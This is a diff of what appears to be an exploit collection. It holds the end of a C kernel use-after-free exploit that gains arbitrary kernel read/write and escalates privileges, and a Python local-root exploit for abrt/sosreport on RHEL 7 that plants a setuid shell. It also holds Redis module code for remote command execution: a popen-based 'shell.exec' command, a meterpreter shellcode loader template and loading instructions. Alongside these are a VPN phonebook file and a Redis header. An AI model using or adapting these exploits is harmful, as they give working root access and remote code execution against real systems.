+  triggered = 1;
+
+  pthread_join(th[0], NULL);
+  pthread_join(th[1], NULL);
+
+  return find_overlap_sock();
+}
+
+static int fake_pktopts(uint64_t pktinfo) {
+  char buf[0x100];
+  int rthdr_len, tclass;
+
+  // Free master_sock's pktopts
+  free_pktopts(overlap_sock);
+
+  // Spray rthdr's to refill master_sock's pktopts
+  rthdr_len = build_rthdr_msg(buf, 0x100);
+  for (int i = 0; i < NUM_SPRAY; i++) {
+    *(uint64_t *)(buf + PKTOPTS_PKTINFO_OFFSET) = pktinfo;
+    *(uint32_t *)(buf + PKTOPTS_TCLASS_OFFSET)  = TCLASS_MASTER | i;
+    set_rthdr(spray_sock[i], buf, rthdr_len);
+  }
+
+  tclass = get_tclass(master_sock);
+
+  // See if pktopts has been refilled correctly
+  if ((tclass & 0xffff0000) != TCLASS_MASTER) {
+    printf("[-] Error could not refill pktopts.\n");
+    exit(1);
+  }
+
+  return tclass & 0xffff;
+}
+
+static void leak_kevent_pktopts(void) {
+  char buf[0x800];
+
+  struct kevent kv;
+  EV_SET(&kv, kevent_sock, EVFILT_READ, EV_ADD, 0, 5, NULL);
+
+  // Free pktopts
+  for (int i = 0; i < NUM_SPRAY; i++)
+    free_pktopts(spray_sock[i]);
+
+  // Leak 0x800 kmalloc addr
+  kevent_addr = leak_kmalloc(buf, 0x800);
+  printf("[+] kevent_addr: 0x%lx\n", kevent_addr);
+
+  // Free rthdr buffer and spray kevents to occupy this location
+  free_rthdr(master_sock);
+  for (int i = 0; i < NUM_KQUEUES; i++)
+    kevent(kq[i], &kv, 1, 0, 0, 0);
+
+  // Leak 0x100 kmalloc addr
+  pktopts_addr = leak_kmalloc(buf, 0x100);
+  printf("[+] pktopts_addr: 0x%lx\n", pktopts_addr);
+
+  // Free rthdr buffer and spray pktopts to occupy this location
+  free_rthdr(master_sock);
+  for (int i = 0; i < NUM_SPRAY; i++)
+    set_tclass(spray_sock[i], 0);
+}
+
+int main(int argc, char *argv[]) {
+  uint64_t knote, kn_fop, f_detach;
+  int idx;
+
+  printf("[*] Initializing sockets...\n");
+
+  kevent_sock = new_socket();
+  master_sock = new_socket();
+
+  for (int i = 0; i < NUM_SPRAY; i++)
+    spray_sock[i] = new_socket();
+
+  for (int i = 0; i < NUM_KQUEUES; i++)
+    kq[i] = kqueue();
+
+  printf("[*] Triggering UAF...\n");
+  idx = trigger_uaf();
+  if (idx == -1) {
+    printf("[-] Error could not find overlap sock.\n");
+    exit(1);
+  }
+
+  // master_sock and overlap_sock point to the same pktopts
+  overlap_sock = spray_sock[idx];
+  spray_sock[idx] = new_socket();
+  printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx);
+
+  // Reallocate pktopts
+  for (int i = 0; i < NUM_SPRAY; i++) {
+    free_pktopts(spray_sock[i]);
+    set_tclass(spray_sock[i], 0);
+  }
+
+  // Fake master pktopts
+  idx = fake_pktopts(0);
+  overlap_sock = spray_sock[idx];
+  spray_sock[idx] = new_socket(); // use new socket so logic in spraying will be easier
+  printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx);
+
+  // Leak address of some kevent and pktopts
+  leak_kevent_pktopts();
+
+  // Fake master pktopts
+  idx = fake_pktopts(pktopts_addr + PKTOPTS_PKTINFO_OFFSET);
+  overlap_sock = spray_sock[idx];
+  printf("[+] Overlap socket: %x (%x)\n", overlap_sock, idx);
+
+  idx = find_victim_sock();
+  if (idx == -1) {
+    printf("[-] Error could not find victim sock.\n");
+    exit(1);
+  }
+
+  victim_sock = spray_sock[idx];
+  printf("[+] Victim socket: %x (%x)\n", victim_sock, idx);
+
+  printf("[+] Arbitrary R/W achieved.\n");
+
+  knote    = kread64(kevent_addr + kevent_sock * sizeof(uintptr_t));
+  kn_fop   = kread64(knote + KNOTE_FOP_OFFSET);
+  f_detach = kread64(kn_fop + FILTEROPS_DETACH_OFFSET);
+
+  printf("[+] knote: 0x%lx\n", knote);
+  printf("[+] kn_fop: 0x%lx\n", kn_fop);
+  printf("[+] f_detach: 0x%lx\n", f_detach);
+
+  printf("[+] Finding kernel base...\n");
+  kernel_base = find_kernel_base(f_detach);
+  printf("[+] Kernel base: 0x%lx\n", kernel_base);
+
+  printf("[+] Finding process cred and fd...\n");
+  find_proc_cred_and_fd(getpid());
+
+  printf("[*] Escalating privileges...\n");
+  escalate_privileges();
+
+  printf("[*] Cleaning up...\n");
+  cleanup();
+
+  printf("[+] Done.\n");
+
+  return 0;
+}
@@ -0,0 +1,114 @@
+#!/usr/bin/python
+# CVE-2015-5287 (?)
+# abrt/sosreport RHEL 7.0/7.1 local root
+# rebel 09/2015
+
+# [user@localhost ~]$ python sosreport-rhel7.py
+# crashing pid 19143
+# waiting for dump directory
+# dump directory:  /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
+# waiting for sosreport directory
+# sosreport:  sosreport-localhost.localdomain-20151130194114
+# waiting for tmpfiles
+# tmpfiles:  ['tmpurfpyY', 'tmpYnCfnQ']
+# moving directory
+# moving tmpfiles
+# tmpurfpyY -> tmpurfpyY.old
+# tmpYnCfnQ -> tmpYnCfnQ.old
+# waiting for sosreport to finish (can take several minutes)........................................done
+# success
+# bash-4.2# id
+# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+# bash-4.2# cat /etc/redhat-release 
+# Red Hat Enterprise Linux Server release 7.1 (Maipo)
+
+import os,sys,glob,time,sys,socket
+
+payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
+
+pid = os.fork()
+
+if pid == 0:
+	os.execl("/usr/bin/sleep","sleep","100")
+
+time.sleep(0.5)
+
+print "crashing pid %d" % pid
+
+os.kill(pid,11)
+
+print "waiting for dump directory"
+
+def waitpath(p):
+	while 1:
+		r = glob.glob(p)
+		if len(r) > 0:
+			return r
+		time.sleep(0.05)	
+
+dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
+
+print "dump directory: ", dumpdir
+
+os.chdir(dumpdir)
+
+print "waiting for sosreport directory"
+
+sosreport = waitpath("sosreport-*")[0]
+
+print "sosreport: ", sosreport
+
+print "waiting for tmpfiles"
+tmpfiles = waitpath("tmp*")
+
+print "tmpfiles: ", tmpfiles
+
+print "moving directory"
+
+os.rename(sosreport, sosreport + ".old")
+os.mkdir(sosreport)
+os.chmod(sosreport,0777)
+
+os.mkdir(sosreport + "/sos_logs")
+os.chmod(sosreport + "/sos_logs",0777)
+
+os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
+os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
+
+print "moving tmpfiles"
+
+for x in tmpfiles:
+	print "%s -> %s" % (x,x + ".old")
+	os.rename(x, x + ".old")
+	open(x, "w+").write("/tmp/hax.sh\n")
+	os.chmod(x,0666)
+
+
+os.chdir("/")
+
+sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
+
+
+def trigger():
+	open("/tmp/hax.sh","w+").write(payload)
+	os.chmod("/tmp/hax.sh",0755)
+	try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
+	except: pass
+	time.sleep(0.5)
+	try:
+		os.stat("/tmp/sh")
+	except:
+		print "could not create suid"
+		sys.exit(-1)
+	print "success"
+	os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
+	sys.exit(-1)
+
+for x in xrange(0,60*10):
+	if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
+		print "done"
+		trigger()
+	time.sleep(1)
+	sys.stderr.write(".")
+
+print "timed out"
@@ -0,0 +1,102 @@
+[VPNTEST]
+Encoding=1
+PBVersion=1
+Type=2
+AutoLogon=1
+UseRasCredentials=1
+LowDateTime=-1345834320
+HighDateTime=30248544
+DialParamsUID=849441
+Guid=174463CE6AAFD4458FC57A466A95B787
+VpnStrategy=1
+ExcludedProtocols=0
+LcpExtensions=1
+DataEncryption=8
+SwCompression=0
+NegotiateMultilinkAlways=0
+SkipDoubleDialDialog=0
+DialMode=0
+OverridePref=15
+RedialAttempts=3
+RedialSeconds=60
+IdleDisconnectSeconds=0
+RedialOnLinkFailure=1
+CallbackMode=0
+CustomDialDll=
+CustomDialFunc=
+CustomRasDialDll=
+ForceSecureCompartment=0
+DisableIKENameEkuCheck=0
+AuthenticateServer=0
+ShareMsFilePrint=1
+BindMsNetClient=1
+SharedPhoneNumbers=0
+GlobalDeviceSettings=0
+PrerequisiteEntry=
+PrerequisitePbk=
+PreferredPort=VPN3-0
+PreferredDevice=WAN Miniport (PPTP)
+PreferredBps=0
+PreferredHwFlow=1
+PreferredProtocol=1
+PreferredCompression=1
+PreferredSpeaker=1
+PreferredMdmProtocol=0
+PreviewUserPw=1
+PreviewDomain=1
+PreviewPhoneNumber=0
+ShowDialingProgress=1
+ShowMonitorIconInTaskBar=1
+CustomAuthKey=0
+AuthRestrictions=544
+IpPrioritizeRemote=1
+IpInterfaceMetric=0
+IpHeaderCompression=0
+IpAddress=0.0.0.0
+IpDnsAddress=0.0.0.0
+IpDns2Address=0.0.0.0
+IpWinsAddress=0.0.0.0
+IpWins2Address=0.0.0.0
+IpAssign=1
+IpNameAssign=1
+IpDnsFlags=0
+IpNBTFlags=1
+TcpWindowSize=0
+UseFlags=2
+IpSecFlags=0
+IpDnsSuffix=
+Ipv6Assign=1
+Ipv6Address=::
+Ipv6PrefixLength=0
+Ipv6PrioritizeRemote=1
+Ipv6InterfaceMetric=0
+Ipv6NameAssign=1
+Ipv6DnsAddress=::
+Ipv6Dns2Address=::
+Ipv6Prefix=0000000000000000
+Ipv6InterfaceId=0000000000000000
+DisableClassBasedDefaultRoute=0
+DisableMobility=0
+NetworkOutageTime=0
+ProvisionType=0
+PreSharedKey=
+
+NETCOMPONENTS=
+ms_msclient=1
+ms_server=1
+
+MEDIA=rastapi
+Port=VPN3-0
+Device=WAN Miniport (PPTP)
+
+DEVICE=vpn
+PhoneNumber=127.0.0.1
+AreaCode=
+CountryCode=0
+CountryID=0
+UseDialingRules=0
+Comment=
+FriendlyName=
+LastSelectedPhone=0
+PromoteAlternates=0
+TryNextAlternateOnFail=1
@@ -0,0 +1,35 @@
+#set environment variable RM_INCLUDE_DIR to the location of redismodule.h
+ifndef RM_INCLUDE_DIR
+	RM_INCLUDE_DIR=./
+endif
+
+ifndef RMUTIL_LIBDIR
+	RMUTIL_LIBDIR=./rmutil
+endif
+
+# find the OS
+uname_S := $(shell sh -c 'uname -s 2>/dev/null || echo not')
+
+# Compile flags for linux / osx
+ifeq ($(uname_S),Linux)
+	SHOBJ_CFLAGS ?=  -fno-common -g -ggdb
+	SHOBJ_LDFLAGS ?= -shared -Bsymbolic
+else
+	SHOBJ_CFLAGS ?= -dynamic -fno-common -g -ggdb
+	SHOBJ_LDFLAGS ?= -bundle -undefined dynamic_lookup
+endif
+CFLAGS = -I$(RM_INCLUDE_DIR) -Wall -g -fPIC -lc -lm -std=gnu99 -fno-stack-protector -z execstack 
+CC=gcc
+
+all: rmutil module.so
+
+rmutil: FORCE
+	$(MAKE) -C $(RMUTIL_LIBDIR)
+
+module.so: module.o
+	$(LD) -o $@ module.o $(SHOBJ_LDFLAGS) $(LIBS) -L$(RMUTIL_LIBDIR) -lrmutil -lc -z execstack
+
+clean:
+	rm -rf *.xo *.so *.o
+
+FORCE:
@@ -0,0 +1,35 @@
+#set environment variable RM_INCLUDE_DIR to the location of redismodule.h
+ifndef RM_INCLUDE_DIR
+	RM_INCLUDE_DIR=../
+endif
+
+ifndef RMUTIL_LIBDIR
+	RMUTIL_LIBDIR=../rmutil
+endif
+
+# find the OS
+uname_S := $(shell sh -c 'uname -s 2>/dev/null || echo not')
+
+# Compile flags for linux / osx
+ifeq ($(uname_S),Linux)
+	SHOBJ_CFLAGS ?=  -fno-common -g -ggdb
+	SHOBJ_LDFLAGS ?= -shared -Bsymbolic
+else
+	SHOBJ_CFLAGS ?= -dynamic -fno-common -g -ggdb
+	SHOBJ_LDFLAGS ?= -bundle -undefined dynamic_lookup
+endif
+CFLAGS = -I$(RM_INCLUDE_DIR) -Wall -g -fPIC -lc -lm -std=gnu99 -fno-stack-protector -z execstack 
+CC=gcc
+
+all: rmutil exp.so
+
+rmutil: FORCE
+	$(MAKE) -C $(RMUTIL_LIBDIR)
+
+exp.so: exp.o
+	$(LD) -o $@ exp.o $(SHOBJ_LDFLAGS) $(LIBS) -L$(RMUTIL_LIBDIR) -lrmutil -lc -z execstack
+
+clean:
+	rm -rf *.xo *.so *.o
+
+FORCE:
@@ -0,0 +1,47 @@
+#include "redismodule.h"
+
+#include <stdio.h> 
+#include <unistd.h>  
+#include <stdlib.h> 
+#include <errno.h>   
+#include <sys/wait.h>
+#include <sys/types.h> 
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int Shell(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
+        if (argc == 2) {
+                size_t cmd_len;
+                size_t size = 1024;
+                char *cmd = RedisModule_StringPtrLen(argv[1], &cmd_len);
+
+                FILE *fp = popen(cmd, "r");
+                char *buf, *output;
+                buf = (char *)malloc(size);
+                output = (char *)malloc(size);
+                while ( fgets(buf, sizeof(buf), fp) != 0 ) {
+                        if (strlen(buf) + strlen(output) >= size) {
+                                output = realloc(output, size<<2);
+                                size <<= 1;
+                        }
+                        strcat(output, buf);
+                }
+                RedisModuleString *ret = RedisModule_CreateString(ctx, output, strlen(output));
+                RedisModule_ReplyWithString(ctx, ret);
+                pclose(fp);
+        } else {
+                return RedisModule_WrongArity(ctx);
+        }
+        return REDISMODULE_OK;
+}
+
+int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
+    if (RedisModule_Init(ctx,"shell",1,REDISMODULE_APIVER_1)
+                        == REDISMODULE_ERR) return REDISMODULE_ERR;
+
+    if (RedisModule_CreateCommand(ctx, "shell.exec",
+        Shell, "readonly", 1, 1, 1) == REDISMODULE_ERR)
+        return REDISMODULE_ERR;
+
+    return REDISMODULE_OK;
+}
@@ -0,0 +1,23 @@
+## Intro
+
+This is a compiled shared object file of redis module.
+
+## Load redis extension
+
+```
+MODULE load ./exp.so
+```
+
+## Run command
+
+```
+redis-cli
+127.0.0.1:6379> shell.exec "whoami"
+```
+## Compile
+
+You can modify the exp.c source code if you want.
+And the compile it to exp.so in current directory.
+```
+make
+```
@@ -0,0 +1,38 @@
+#include "redismodule.h"
+
+#include <stdio.h> 
+#include <unistd.h>  
+#include <stdlib.h> 
+#include <errno.h>   
+#include <sys/wait.h>
+#include <sys/types.h> 
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int Shell(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
+
+    pid_t child_pid = fork();
+    if (child_pid == 0)
+    {
+        // Your meterpreter shell here
+        <%= buf %>
+
+        int (*ret)() = (int(*)())buf;
+        ret();
+    }
+    else
+        {wait(NULL);}
+
+    return REDISMODULE_OK;
+}
+
+
+int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
+    if (RedisModule_Init(ctx,<%= @module_init_name.inspect %>,1,REDISMODULE_APIVER_1)
+                        == REDISMODULE_ERR) return REDISMODULE_ERR;
+
+    if (RedisModule_CreateCommand(ctx, <%= @module_cmd.inspect %>,
+        Shell, "readonly", 1, 1, 1) == REDISMODULE_ERR)
+        return REDISMODULE_ERR;
+    return REDISMODULE_OK;
+}
@@ -0,0 +1,509 @@
+#ifndef REDISMODULE_H
+#define REDISMODULE_H
+
+#include <sys/types.h>
+#include <stdint.h>
+#include <stdio.h>
+
+/* ---------------- Defines common between core and modules --------------- */
+
+/* Error status return values. */
+#define REDISMODULE_OK 0
+#define REDISMODULE_ERR 1
+
+/* API versions. */
+#define REDISMODULE_APIVER_1 1
+
+/* API flags and constants */
+#define REDISMODULE_READ (1<<0)
+#define REDISMODULE_WRITE (1<<1)
+
+#define REDISMODULE_LIST_HEAD 0
+#define REDISMODULE_LIST_TAIL 1
+
+/* Key types. */
+#define REDISMODULE_KEYTYPE_EMPTY 0
+#define REDISMODULE_KEYTYPE_STRING 1
+#define REDISMODULE_KEYTYPE_LIST 2
+#define REDISMODULE_KEYTYPE_HASH 3
+#define REDISMODULE_KEYTYPE_SET 4
+#define REDISMODULE_KEYTYPE_ZSET 5
+#define REDISMODULE_KEYTYPE_MODULE 6
+
+/* Reply types. */
+#define REDISMODULE_REPLY_UNKNOWN -1
+#define REDISMODULE_REPLY_STRING 0
+#define REDISMODULE_REPLY_ERROR 1
+#define REDISMODULE_REPLY_INTEGER 2
+#define REDISMODULE_REPLY_ARRAY 3
+#define REDISMODULE_REPLY_NULL 4
+
+/* Postponed array length. */
+#define REDISMODULE_POSTPONED_ARRAY_LEN -1
+
+/* Expire */
+#define REDISMODULE_NO_EXPIRE -1
+
+/* Sorted set API flags. */
+#define REDISMODULE_ZADD_XX      (1<<0)
+#define REDISMODULE_ZADD_NX      (1<<1)
+#define REDISMODULE_ZADD_ADDED   (1<<2)
+#define REDISMODULE_ZADD_UPDATED (1<<3)
+#define REDISMODULE_ZADD_NOP     (1<<4)
+
+/* Hash API flags. */
+#define REDISMODULE_HASH_NONE       0
+#define REDISMODULE_HASH_NX         (1<<0)
+#define REDISMODULE_HASH_XX         (1<<1)
+#define REDISMODULE_HASH_CFIELDS    (1<<2)
+#define REDISMODULE_HASH_EXISTS     (1<<3)
+
+/* Context Flags: Info about the current context returned by
+ * RM_GetContextFlags(). */
+
+/* The command is running in the context of a Lua script */
+#define REDISMODULE_CTX_FLAGS_LUA (1<<0)
+/* The command is running inside a Redis transaction */
+#define REDISMODULE_CTX_FLAGS_MULTI (1<<1)
+/* The instance is a master */
+#define REDISMODULE_CTX_FLAGS_MASTER (1<<2)
+/* The instance is a slave */
+#define REDISMODULE_CTX_FLAGS_SLAVE (1<<3)
+/* The instance is read-only (usually meaning it's a slave as well) */
+#define REDISMODULE_CTX_FLAGS_READONLY (1<<4)
+/* The instance is running in cluster mode */
+#define REDISMODULE_CTX_FLAGS_CLUSTER (1<<5)
+/* The instance has AOF enabled */
+#define REDISMODULE_CTX_FLAGS_AOF (1<<6)
+/* The instance has RDB enabled */
+#define REDISMODULE_CTX_FLAGS_RDB (1<<7)
+/* The instance has Maxmemory set */
+#define REDISMODULE_CTX_FLAGS_MAXMEMORY (1<<8)
+/* Maxmemory is set and has an eviction policy that may delete keys */
+#define REDISMODULE_CTX_FLAGS_EVICT (1<<9)
+/* Redis is out of memory according to the maxmemory flag. */
+#define REDISMODULE_CTX_FLAGS_OOM (1<<10)
+/* Less than 25% of memory available according to maxmemory. */
+#define REDISMODULE_CTX_FLAGS_OOM_WARNING (1<<11)
+
+#define REDISMODULE_NOTIFY_GENERIC (1<<2)     /* g */
+#define REDISMODULE_NOTIFY_STRING (1<<3)      /* $ */
+#define REDISMODULE_NOTIFY_LIST (1<<4)        /* l */
+#define REDISMODULE_NOTIFY_SET (1<<5)         /* s */
+#define REDISMODULE_NOTIFY_HASH (1<<6)        /* h */
+#define REDISMODULE_NOTIFY_ZSET (1<<7)        /* z */
+#define REDISMODULE_NOTIFY_EXPIRED (1<<8)     /* x */
+#define REDISMODULE_NOTIFY_EVICTED (1<<9)     /* e */
+#define REDISMODULE_NOTIFY_STREAM (1<<10)     /* t */
+#define REDISMODULE_NOTIFY_ALL (REDISMODULE_NOTIFY_GENERIC | REDISMODULE_NOTIFY_STRING | REDISMODULE_NOTIFY_LIST | REDISMODULE_NOTIFY_SET | REDISMODULE_NOTIFY_HASH | REDISMODULE_NOTIFY_ZSET | REDISMODULE_NOTIFY_EXPIRED | REDISMODULE_NOTIFY_EVICTED | REDISMODULE_NOTIFY_STREAM)      /* A */
+
+
+/* A special pointer that we can use between the core and the module to signal
+ * field deletion, and that is impossible to be a valid pointer. */
+#define REDISMODULE_HASH_DELETE ((RedisModuleString*)(long)1)
+
+/* Error messages. */
+#define REDISMODULE_ERRORMSG_WRONGTYPE "WRONGTYPE Operation against a key holding the wrong kind of value"
+
+#define REDISMODULE_POSITIVE_INFINITE (1.0/0.0)
+#define REDISMODULE_NEGATIVE_INFINITE (-1.0/0.0)
+
+/* Cluster API defines. */
+#define REDISMODULE_NODE_ID_LEN 40
+#define REDISMODULE_NODE_MYSELF     (1<<0)
+#define REDISMODULE_NODE_MASTER     (1<<1)
+#define REDISMODULE_NODE_SLAVE      (1<<2)
+#define REDISMODULE_NODE_PFAIL      (1<<3)
+#define REDISMODULE_NODE_FAIL       (1<<4)
+#define REDISMODULE_NODE_NOFAILOVER (1<<5)
+
+#define REDISMODULE_CLUSTER_FLAG_NONE 0
+#define REDISMODULE_CLUSTER_FLAG_NO_FAILOVER (1<<1)
+#define REDISMODULE_CLUSTER_FLAG_NO_REDIRECTION (1<<2)
+
+#define REDISMODULE_NOT_USED(V) ((void) V)
+
+/* This type represents a timer handle, and is returned when a timer is
+ * registered and used in order to invalidate a timer. It's just a 64 bit
+ * number, because this is how each timer is represented inside the radix tree
+ * of timers that are going to expire, sorted by expire time. */
+typedef uint64_t RedisModuleTimerID;
+
+/* ------------------------- End of common defines ------------------------ */
+
+#ifndef REDISMODULE_CORE
+
+typedef long long mstime_t;
+
+/* Incomplete structures for compiler checks but opaque access. */
+typedef struct RedisModuleCtx RedisModuleCtx;
+typedef struct RedisModuleKey RedisModuleKey;
+typedef struct RedisModuleString RedisModuleString;
+typedef struct RedisModuleCallReply RedisModuleCallReply;
+typedef struct RedisModuleIO RedisModuleIO;
+typedef struct RedisModuleType RedisModuleType;
+typedef struct RedisModuleDigest RedisModuleDigest;
+typedef struct RedisModuleBlockedClient RedisModuleBlockedClient;
+typedef struct RedisModuleClusterInfo RedisModuleClusterInfo;
+typedef struct RedisModuleDict RedisModuleDict;
+typedef struct RedisModuleDictIter RedisModuleDictIter;
+
+typedef int (*RedisModuleCmdFunc)(RedisModuleCtx *ctx, RedisModuleString **argv, int argc);
+typedef void (*RedisModuleDisconnectFunc)(RedisModuleCtx *ctx, RedisModuleBlockedClient *bc);
+typedef int (*RedisModuleNotificationFunc)(RedisModuleCtx *ctx, int type, const char *event, RedisModuleString *key);
+typedef void *(*RedisModuleTypeLoadFunc)(RedisModuleIO *rdb, int encver);
+typedef void (*RedisModuleTypeSaveFunc)(RedisModuleIO *rdb, void *value);
+typedef void (*RedisModuleTypeRewriteFunc)(RedisModuleIO *aof, RedisModuleString *key, void *value);
+typedef size_t (*RedisModuleTypeMemUsageFunc)(const void *value);
+typedef void (*RedisModuleTypeDigestFunc)(RedisModuleDigest *digest, void *value);
+typedef void (*RedisModuleTypeFreeFunc)(void *value);
+typedef void (*RedisModuleClusterMessageReceiver)(RedisModuleCtx *ctx, const char *sender_id, uint8_t type, const unsigned char *payload, uint32_t len);
+typedef void (*RedisModuleTimerProc)(RedisModuleCtx *ctx, void *data);
+
+#define REDISMODULE_TYPE_METHOD_VERSION 1
+typedef struct RedisModuleTypeMethods {
+    uint64_t version;
+    RedisModuleTypeLoadFunc rdb_load;
+    RedisModuleTypeSaveFunc rdb_save;
+    RedisModuleTypeRewriteFunc aof_rewrite;
+    RedisModuleTypeMemUsageFunc mem_usage;
+    RedisModuleTypeDigestFunc digest;
+    RedisModuleTypeFreeFunc free;
+} RedisModuleTypeMethods;
+
+#define REDISMODULE_GET_API(name) \
+    RedisModule_GetApi("RedisModule_" #name, ((void **)&RedisModule_ ## name))
+
+#define REDISMODULE_API_FUNC(x) (*x)
+
+
+void *REDISMODULE_API_FUNC(RedisModule_Alloc)(size_t bytes);
+void *REDISMODULE_API_FUNC(RedisModule_Realloc)(void *ptr, size_t bytes);
+void REDISMODULE_API_FUNC(RedisModule_Free)(void *ptr);
+void *REDISMODULE_API_FUNC(RedisModule_Calloc)(size_t nmemb, size_t size);
+char *REDISMODULE_API_FUNC(RedisModule_Strdup)(const char *str);
+int REDISMODULE_API_FUNC(RedisModule_GetApi)(const char *, void *);
+int REDISMODULE_API_FUNC(RedisModule_CreateCommand)(RedisModuleCtx *ctx, const char *name, RedisModuleCmdFunc cmdfunc, const char *strflags, int firstkey, int lastkey, int keystep);
+void REDISMODULE_API_FUNC(RedisModule_SetModuleAttribs)(RedisModuleCtx *ctx, const char *name, int ver, int apiver);
+int REDISMODULE_API_FUNC(RedisModule_IsModuleNameBusy)(const char *name);
+int REDISMODULE_API_FUNC(RedisModule_WrongArity)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithLongLong)(RedisModuleCtx *ctx, long long ll);
+int REDISMODULE_API_FUNC(RedisModule_GetSelectedDb)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_SelectDb)(RedisModuleCtx *ctx, int newid);
+void *REDISMODULE_API_FUNC(RedisModule_OpenKey)(RedisModuleCtx *ctx, RedisModuleString *keyname, int mode);
+void REDISMODULE_API_FUNC(RedisModule_CloseKey)(RedisModuleKey *kp);
+int REDISMODULE_API_FUNC(RedisModule_KeyType)(RedisModuleKey *kp);
+size_t REDISMODULE_API_FUNC(RedisModule_ValueLength)(RedisModuleKey *kp);
+int REDISMODULE_API_FUNC(RedisModule_ListPush)(RedisModuleKey *kp, int where, RedisModuleString *ele);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_ListPop)(RedisModuleKey *key, int where);
+RedisModuleCallReply *REDISMODULE_API_FUNC(RedisModule_Call)(RedisModuleCtx *ctx, const char *cmdname, const char *fmt, ...);
+const char *REDISMODULE_API_FUNC(RedisModule_CallReplyProto)(RedisModuleCallReply *reply, size_t *len);
+void REDISMODULE_API_FUNC(RedisModule_FreeCallReply)(RedisModuleCallReply *reply);
+int REDISMODULE_API_FUNC(RedisModule_CallReplyType)(RedisModuleCallReply *reply);
+long long REDISMODULE_API_FUNC(RedisModule_CallReplyInteger)(RedisModuleCallReply *reply);
+size_t REDISMODULE_API_FUNC(RedisModule_CallReplyLength)(RedisModuleCallReply *reply);
+RedisModuleCallReply *REDISMODULE_API_FUNC(RedisModule_CallReplyArrayElement)(RedisModuleCallReply *reply, size_t idx);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateString)(RedisModuleCtx *ctx, const char *ptr, size_t len);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringFromLongLong)(RedisModuleCtx *ctx, long long ll);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringFromString)(RedisModuleCtx *ctx, const RedisModuleString *str);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringPrintf)(RedisModuleCtx *ctx, const char *fmt, ...);
+void REDISMODULE_API_FUNC(RedisModule_FreeString)(RedisModuleCtx *ctx, RedisModuleString *str);
+const char *REDISMODULE_API_FUNC(RedisModule_StringPtrLen)(const RedisModuleString *str, size_t *len);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithError)(RedisModuleCtx *ctx, const char *err);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithSimpleString)(RedisModuleCtx *ctx, const char *msg);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithArray)(RedisModuleCtx *ctx, long len);
+void REDISMODULE_API_FUNC(RedisModule_ReplySetArrayLength)(RedisModuleCtx *ctx, long len);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithStringBuffer)(RedisModuleCtx *ctx, const char *buf, size_t len);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithString)(RedisModuleCtx *ctx, RedisModuleString *str);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithNull)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithDouble)(RedisModuleCtx *ctx, double d);
+int REDISMODULE_API_FUNC(RedisModule_ReplyWithCallReply)(RedisModuleCtx *ctx, RedisModuleCallReply *reply);
+int REDISMODULE_API_FUNC(RedisModule_StringToLongLong)(const RedisModuleString *str, long long *ll);
+int REDISMODULE_API_FUNC(RedisModule_StringToDouble)(const RedisModuleString *str, double *d);
+void REDISMODULE_API_FUNC(RedisModule_AutoMemory)(RedisModuleCtx *ctx);
+int REDISMODULE_API_FUNC(RedisModule_Replicate)(RedisModuleCtx *ctx, const char *cmdname, const char *fmt, ...);
+int REDISMODULE_API_FUNC(RedisModule_ReplicateVerbatim)(RedisModuleCtx *ctx);
+const char *REDISMODULE_API_FUNC(RedisModule_CallReplyStringPtr)(RedisModuleCallReply *reply, size_t *len);
+RedisModuleString *REDISMODULE_API_FUNC(RedisModule_CreateStringFromCallReply)(RedisModuleCallReply *reply);
+int REDISMODULE_API_FUNC(RedisModule_DeleteKey)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_UnlinkKey)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_StringSet)(RedisModuleKey *key, RedisModuleString *str);
+char *REDISMODULE_API_FUNC(RedisModule_StringDMA)(RedisModuleKey *key, size_t *len, int mode);
+int REDISMODULE_API_FUNC(RedisModule_StringTruncate)(RedisModuleKey *key, size_t newlen);
+mstime_t REDISMODULE_API_FUNC(RedisModule_GetExpire)(RedisModuleKey *key);
+int REDISMODULE_API_FUNC(RedisModule_SetExpire)(RedisModuleKey *key, mstime_t expire);
+int REDISMODULE_API_FUNC(RedisModule_ZsetAdd)(RedisModuleKey *key, double score, RedisModuleString *ele, int *flagsptr);
+int REDISMODULE_API_FUNC(RedisModule_ZsetIncrby)(RedisModuleKey *key, double score, RedisModuleString *ele, int *flagsptr, double *newscore);
+int REDISMODULE_API_FUNC(RedisModule_ZsetScore)(RedisModuleKey *key, RedisModuleString *ele, double *score);
